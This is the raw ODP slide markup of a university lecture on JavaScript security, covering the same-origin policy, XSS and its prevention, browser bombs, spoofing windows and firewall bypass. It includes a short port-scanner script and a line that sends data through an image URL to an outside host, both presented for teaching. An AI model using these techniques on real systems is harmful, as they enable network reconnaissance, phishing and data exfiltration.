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fill="none" fo:min-height="2.057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6.645cm"/>
    </style:style>
    <style:style style:name="gr4" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" draw:fill="none" fo:min-height="2.728cm"/>
    </style:style>
    <style:style style:name="gr5" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-color="#000000" draw:fill="none" fo:min-height="7.414cm"/>
    </style:style>
    <style:style style:name="pr1" style:family="presentation" style:parent-style-name="Carleton_25_20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5_20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5_20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fo:min-height="2.291cm"/>
    </style:style>
    <style:style style:name="pr5" style:family="presentation" style:parent-style-name="Default-outline1">
      <style:graphic-properties draw:fill-color="#ffffff" fo:min-height="12.028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draw:auto-grow-height="true" fo:min-height="2.542cm"/>
    </style:style>
    <style:style style:name="pr8" style:family="presentation" style:parent-style-name="Default-outline1">
      <style:graphic-properties draw:fill-color="#ffffff" draw:auto-grow-height="true" fo:min-height="12.2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1.9cm" fo:margin-right="0cm" fo:text-indent="-0.63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'Luxi Mono'" style:font-pitch="fixed" fo:font-size="18pt"/>
    </style:style>
    <style:style style:name="P10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1" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="2.698cm" fo:margin-right="0cm" fo:text-indent="-0.48cm"/>
    </style:style>
    <style:style style:name="P12" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-align="start" fo:text-indent="0cm"/>
      <style:text-properties fo:font-family="'DejaVu Sans Mono'" style:font-family-generic="swiss" style:font-pitch="fixed" fo:font-size="18pt" style:font-size-asian="18pt" style:font-size-complex="18pt"/>
    </style:style>
    <style:style style:name="P13" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-align="start" fo:text-indent="0cm"/>
      <style:text-properties fo:font-family="'Cumberland AMT', Cumberland, 'Courier New', 'Nimbus Mono L', 'DejaVu Sans Mono', Courier, 'Lucida Sans Typewriter', 'Lucida Typewriter', Monaco, Monospaced" style:font-family-generic="modern" style:font-pitch="fixed" fo:font-size="16pt" style:font-size-asian="16pt" style:font-size-complex="16pt"/>
    </style:style>
    <style:style style:name="P14" style:family="paragraph">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:text-align="start" fo:text-indent="0cm"/>
      <style:text-properties fo:font-family="'Cumberland AMT', Cumberland, 'Courier New', 'Nimbus Mono L', 'DejaVu Sans Mono', Courier, 'Lucida Sans Typewriter', 'Lucida Typewriter', Monaco, Monospaced" style:font-family-generic="modern" style:font-pitch="fixed" fo:font-size="16pt" style:font-size-asian="16pt" style:font-size-complex="16pt"/>
    </style:style>
    <style:style style:name="T1" style:family="text">
      <style:text-properties fo:color="#ffffff"/>
    </style:style>
    <style:style style:name="T2" style:family="text">
      <style:text-properties fo:font-family="'Luxi Mono'" style:font-pitch="fixed"/>
    </style:style>
    <style:style style:name="T3" style:family="text">
      <style:text-properties fo:font-family="'Luxi Mono'" style:font-pitch="fixed" fo:font-size="18pt"/>
    </style:style>
    <style:style style:name="T4" style:family="text">
      <style:text-properties fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="T5" style:family="text">
      <style:text-properties fo:font-family="'Luxi Sans'" style:font-family-generic="swiss" style:font-pitch="variable"/>
    </style:style>
    <style:style style:name="T6" style:family="text">
      <style:text-properties fo:font-style="italic"/>
    </style:style>
    <style:style style:name="T7" style:family="text">
      <style:text-properties fo:font-family="'DejaVu Sans Mono'" style:font-family-generic="swiss" style:font-pitch="fixed" fo:font-size="18pt" style:font-size-asian="18pt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ff" fo:font-size="16pt" style:font-size-asian="16pt" style:font-size-complex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5_20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Javascript Security, XSS, </text:span><text:span text:style-name="T1"><text:line-break/></text:span><text:span text:style-name="T1">and Uncovered Topics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19.05cm" svg:height="2.291cm" svg:x="5.503cm" svg:y="3.3cm" presentation:class="title">
          <draw:text-box>
            <text:p text:style-name="P5">Contents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The Javascript same origin policy</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Cross-site scripting</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Pure Javascript exploits</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Other topic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The JavaScript Same Origin Policy</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.279cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">JavaScript will only let a script access the properties of an object if it has the same origin as the script</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Origin = protocol + server + port number</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">The following script won't work unless it is run from a page at <text:span text:style-name="T2">http://www.google.com/</text:span></text:p>
              </text:list-item>
            </text:list>
          </draw:text-box>
        </draw:frame>
        <draw:frame draw:style-name="gr2" draw:text-style-name="P9" draw:layer="layout" svg:width="19.882cm" svg:height="4.673cm" svg:x="5.08cm" svg:y="13.742cm">
          <draw:text-box>
            <text:p text:style-name="P8"><text:span text:style-name="T3">var w = window.open("http://www.google.com");</text:span></text:p>
            <text:p text:style-name="P8"><text:span text:style-name="T3">// After 10 seconds, let's see what URL</text:span></text:p>
            <text:p text:style-name="P8"><text:span text:style-name="T3">// they're looking at!</text:span></text:p>
            <text:p text:style-name="P8"><text:span text:style-name="T3">var snoopedURL;</text:span></text:p>
            <text:p text:style-name="P8"><text:span text:style-name="T3">setTimeout("snoopedURL = w.location.href()", </text:span></text:p>
            <text:p text:style-name="P8"><text:span text:style-name="T3"><text:s text:c="11"/></text:span><text:span text:style-name="T3">10 * 1000); <text:s/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The Same Origin Policy (Cont'd)</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.279cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline" presentation:user-transformed="true">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">The same origin policy applies to almost everything in JavaScript (frames, windows, etc.)</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6"><text:span text:style-name="T4">Exception:</text:span> </text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">The origin of an externally-linked script is considered to be the origin of the document that links to it (think about why!)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Problem: </text:span>In a website with user accounts: </text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">a script in http://iap.scs.carleton.ca/~morin/ has access to anything from the server iap.scs.carleton.ca, including http://iap.scs.carleton.ca/~smartstudent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Cross-Site Scripting</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="13.05cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Cross-Site Scripting (XSS) is a security exploit that gets around the same origin policy</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Cross-Site Scripting is a potential risk whenever a script displays user input as an HTML page</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Main idea: </text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">The hacker (Hector) uploads data containing code to the server (<text:span text:style-name="T2">samuel.com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omeone else (Bob) accesses <text:span text:style-name="T2">samuel.com</text:span> and looks at the Hector's uploaded data and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ector's code is now running on Bob's computer with permission to look at anything from <text:span text:style-name="T2">samuel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Typical Example of XSS</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.969cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline" presentation:user-transformed="true">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Hector (the hacker) posts on a forum on samuel<text:span text:style-name="T2">.com</text:span> </text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Hector's post includes some JavaScript code</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Bob visits the forum samuel<text:span text:style-name="T2">.com</text:span> and looks at Hector's post</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Hector's JavaScript is now running on Bob's computer and has access to</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Bob's cookies from samuel<text:span text:style-name="T2">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ob's brow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 information in any other pages that Bob has open on samuel<text:span text:style-name="T2">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Hector could even log Bob out of samuel</text:span><text:span text:style-name="T2">.com</text:span><text:span text:style-name="T5"> and eavesdrop as he logs back in ag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Preventing XSS</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.279cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Although XSS is done by an attacker, as a developer it is <text:span text:style-name="T6">your fault</text:span> for letting it happen</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Visitors to your site will blame y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You may be giving away information that can be used to attack your site</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Luckily, XSS isn't too hard to avoid</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Whenever a script displays some input, it should convert all special characters to HTML ent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specially (but not only) the tag delimiter &lt; and &gt;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7.145cm" svg:height="1.725cm" svg:x="6.35cm" svg:y="15.875cm">
          <draw:text-box>
            <text:p text:style-name="P5"><text:span text:style-name="T3">$data =~ s/&lt;/\&amp;lt;/gm;</text:span></text:p>
            <text:p text:style-name="P5"><text:span text:style-name="T3">$data =~ s/&gt;/\&amp;gt;/gm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Why Is XSS Still a Problem?</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.279cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Because many web developers are inexperienced</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">First time programming in PHP/Perl/Whate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rst time writing a web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w it's up and running and it works gre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 don't want to break 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Because most testing is usability and bug testing, not security testing</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Because sometimes the XSS vulnerability is very subtle</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">See the t-rex exa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19.05cm" svg:height="2.291cm" svg:x="5.503cm" svg:y="3.3cm" presentation:class="title">
          <draw:text-box>
            <text:p text:style-name="P5">Pure Javascript Exploits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Javascript is a programming language</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Users run Javascript on their own machines</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Sometimes programs don't do what users want or expec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JavaScript Bombs</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="13.524cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">It is easy to mount a denial-of-service attack on a user's web browser using JavaScript</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">It is easy to write JavaScript that makes a user's browser unusable</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Memory ho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PU ho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cessant alert box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oo many popu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finite recursio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...</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Do this, and the user will never return to your sit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JavaScript and Popups</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.279cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">A simply (dirty) trick:</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Open a new window, make it as small as possible, and send it to the background (by focusing the current window) where the user can't see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riodically, the hidden window will spawn a popup ad</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">In some cases, the hidden window can even be moved off-scree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Chromeless Exploits</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.279cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Some implementations of JavaScript allows the opening of a browser window with no “chrome” that can be made (using an image) to look like any windowing system object</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Examples:</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Looks like system dialog box asking for passwo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oks like blank screen asking for passwo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oks like (and covers up) the browser's URL b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oks like (and covers up) the security ic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19.05cm" svg:height="2.291cm" svg:x="5.503cm" svg:y="3.3cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P5">Same-Origin Workarounds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The same-origin policy is supposed to prevent Javascript from sending data to third parties</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">In an XMLHTTPRequest, the URL must come from the same domain</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">But other Javascript functions don't have this limitation</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Javascript can load images from other si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ata can be encoded in the image's URL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2.225cm" svg:height="2.978cm" svg:x="1.905cm" svg:y="15.24cm">
          <draw:text-box>
            <text:p text:style-name="P12"><text:span text:style-name="T7"><text:s/></text:span><text:span text:style-name="T7">var img = new Image();</text:span></text:p>
            <text:p text:style-name="P12"><text:span text:style-name="T7"><text:s/></text:span><text:span text:style-name="T7">img.src = 'http://myserver.org/' + </text:span></text:p>
            <text:p text:style-name="P12"><text:span text:style-name="T7"><text:s text:c="11"/></text:span><text:span text:style-name="T7">encodeURLData("secret message for server"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Javascript Port Scanning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The same-origin workaround allows for a simple port scanner</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Algorithm</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Set a tim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ad an i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pecific serv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pecific por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f timer completes first then assume port is clo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f load completes first then assume port is open</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">This algorithm isn't completely accurate</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">choice of timeout requires some tu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Example (from AttackAPI)</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame draw:style-name="gr5" draw:text-style-name="P13" draw:layer="layout" svg:width="19.685cm" svg:height="14.231cm" svg:x="5.08cm" svg:y="4.819cm">
          <draw:text-box>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="8"/></text:span><text:span text:style-name="T8">var timeout = (timeout == null)?100:timeout;</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="8"/></text:span><text:span text:style-name="T8">var img = new Image();</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"/></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T9"><text:s text:c="8"/></text:span><text:span text:style-name="T9">// callbacks for when image is loaded or errors</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="8"/></text:span><text:span text:style-name="T8">img.onerror = function () {</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="16"/></text:span><text:span text:style-name="T8">if (!img) return;</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="16"/></text:span><text:span text:style-name="T8">img = undefined;</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="16"/></text:span><text:span text:style-name="T8">alert("Port " + port + "is open");</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="8"/></text:span><text:span text:style-name="T8">};</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="8"/></text:span><text:span text:style-name="T8">img.onload = img.onerror;</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"/></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T9"><text:tab/></text:span><text:span text:style-name="T9">// now load the image in the background</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="8"/></text:span><text:span text:style-name="T8">img.src = 'http://' + target + ':' + port;</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="8"/></text:span></text:p>
            <text:p text:style-name="P14"><text:span text:style-name="T9"><text:tab/></text:span><text:span text:style-name="T9">// now setup a timer</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="8"/></text:span><text:span text:style-name="T8">setTimeout(function () {</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="16"/></text:span><text:span text:style-name="T8">if (!img) return;</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="16"/></text:span><text:span text:style-name="T8">img = undefined;</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="16"/></text:span><text:span text:style-name="T8">alert("Port " + port + "is closed");</text:span></text:p>
            <text:p text:style-name="P13"><text:span text:style-name="T8"><text:s text:c="8"/></text:span><text:span text:style-name="T8">}, timeout)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19.05cm" svg:height="2.291cm" svg:x="5.503cm" svg:y="3.3cm" presentation:class="title">
          <draw:text-box>
            <text:p text:style-name="P5">Javascript Firewall Bypass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Many organizations protect their computers behind a firewall</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Some services running on local machines are only available behind the firewall (to other local machines)</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Doing a port scan behind a firewall</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Client accesses a CGI script on a bad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rver sends back text/html with Javascript that includes the client's IP add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avascript (knows the client's IP) and does a port scan on the local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avascript sends results back to the server using an XMLHTTPRequest or another image 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19.05cm" svg:height="2.295cm" svg:x="5.503cm" svg:y="3.298cm" presentation:class="title" presentation:user-transformed="true">
          <draw:text-box>
            <text:p text:style-name="P5">Javascript Firewall Bypass (Cont'd)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Bypassing a firewall is especially bad</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Some firewalled applications are very insecure</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">telne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uses unencrypted passwor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nge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get information about us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-house application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may not have been designed/implemented with network security in min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In some cases, network applications can be attacked using only Javascript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layer="layout" svg:width="19.05cm" svg:height="2.291cm" svg:x="5.503cm" svg:y="3.3cm" presentation:class="title">
          <draw:text-box>
            <text:p text:style-name="P5">Uncovered Topics</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr5" draw:layer="layout" svg:width="19.05cm" svg:height="12.028cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Javascript libraries</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Server-side scripting libraries</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Installing and configuring web server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JavaScript Libraries</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.28cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline" presentation:user-transformed="true">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">JavaScript has some basic built-in libraries</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Many organizations are offering more sophisticated JavaScript libraries</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Pure JavaScript:</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Prototype, Rico, MochiKit, <text:s/>Dojo Toolkit, Bajax, Behaviour, Solvent, Moo.FX, WZ_DradDrop, WZ_jsGraphics, overLIB, Scriptaculous, SACK, Sarissa (ECMAScript), <text:s/>Nifty Corners, dp.SyntaxHighlighter, <text:s/>AJAX.NET, TOXIC, <text:s/>Plex Toolkit, Cpaint, <text:s/>DOM-Drag, Tibet, Zimbra, qooxdoo, AJFORM, ThyApi, Engine, AJAXGear Toolkit, Interactive Website Framework, RSLite, XHConn, Taconite, qForms, JSPkg, Ajaxcaller, libXmlRequest, SAJAX, Sardalya, X, AjaxRequest, moo.aja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9.05cm" svg:height="2.291cm" svg:x="5.503cm" svg:y="3.3cm" presentation:class="title">
          <draw:text-box>
            <text:p text:style-name="P5">JavaScript Libraries (Cont'd)</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr5" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.028cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">PHP-Based AJAX Frameworks:</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">AjaxAC, XOAD, Zephyr, PAJAJ, Symfony, XAJAX, PEAR:: HTML_AJAX, Flexible AJAX</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">JavaScript for Flash:</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">FlashObject, OSFlash – Flashjs, AFLAX</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Java-Based AJAX Frameworks:</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">ZK, jWic</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Visit http://wiki.osafoundation.org/Projects/AjaxLibraries for more information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Server-Side Scripting</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.39cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline" presentation:user-transformed="true">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">We have seen CGI/Perl as a means of doing server-side scripting</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">There exists several other web application frameworks that include</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">CGI libr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HP (and accompanying librari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avaScript libr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JAX framewo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tent management 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...</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Web search for "web application framework"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Server Configuration and Security</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.279cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Setting up a web server is easy </text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">Downloading and installing Ap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djust firewall settings to allow access to port 80</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Securing a server is hard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19.05cm" svg:height="2.542cm" svg:x="5.503cm" svg:y="3.175cm" presentation:class="title">
          <draw:text-box>
            <text:p text:style-name="P5">A Brief Justification</text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame presentation:style-name="pr8" draw:text-style-name="P6" draw:layer="layout" svg:width="19.05cm" svg:height="12.945cm" svg:x="5.503cm" svg:y="5.502cm" presentation:class="outline" presentation:user-transformed="true">
          <draw:text-box>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">Much of this course might have been easier using</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">HTML edit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H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avaScript libr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rver-side development libraries</text:p>
                  </text:list-item>
                </text:list>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:p text:style-name="P6">We didn't do this because</text:p>
              </text:list-item>
            </text:list>
            <text:list text:style-name="L3">
              <text:list-item>
                <text:list>
                  <text:list-item>
                    <text:p text:style-name="P7">These tools hide the details of how data is represented and how communication takes pl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earning these details means we really understand the whole system (and similar system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Now we can look at these tools without won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We know how they do what they d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ll real breakthroughs start at the lowest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title" style:display-name="Carleton%20U-title" style:family="presentation">
      <style:graphic-properties draw:stroke="none" draw:fill="none" draw:textarea-vertical-align="middle">
        <text:list-style style:name="Carleton_5f_25_5f_20U-title" style:display-name="Carleton_25_20U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5_20U-subtitle" style:display-name="Carleton%20U-subtitle" style:family="presentation">
      <style:graphic-properties draw:stroke="none" draw:fill="none" draw:textarea-vertical-align="middle">
        <text:list-style style:name="Carleton_5f_25_5f_20U-subtitle" style:display-name="Carleton_25_20U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5_20U-background" style:display-name="Carleton%20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5_20U-backgroundobjects" style:display-name="Carleton%20U-backgroundobjects" style:family="presentation">
      <style:graphic-properties draw:shadow="hidden" draw:shadow-offset-x="0.3cm" draw:shadow-offset-y="0.3cm" draw:shadow-color="#808080"/>
    </style:style>
